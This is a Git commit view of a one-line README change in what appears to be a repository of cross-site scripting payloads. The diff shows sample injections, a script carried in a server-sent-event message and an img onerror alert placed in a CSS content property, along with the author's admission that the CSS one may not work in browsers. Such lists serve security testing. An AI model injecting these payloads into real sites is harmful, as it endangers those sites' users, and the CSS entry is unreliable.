malectricasoftware
/
XSS
mirror of https://github.com/malectricasoftware/XSS.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update README.md

main
ShadowByte 2024-08-07 14:18:46 +10:00 committed by GitHub
parent fb1e2841b3
commit 5b2d58a4dc
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
README.md
View File

@ -634,6 +634,7 @@ event: message\ndata: <script>alert('XSS via EventSource')</script>\n\n
CSS Content Property Injection
If an application allows user input in CSS properties without sanitization, it can lead to XSS.
Note:most browsers consider the content property text not html and this works under very certain conditions unsure whether the browser still accepts this however i have inserted here as a use case.
```
<style>
.content::before { content: '<img src=x onerror=alert("XSS via CSS Content Property")>'; }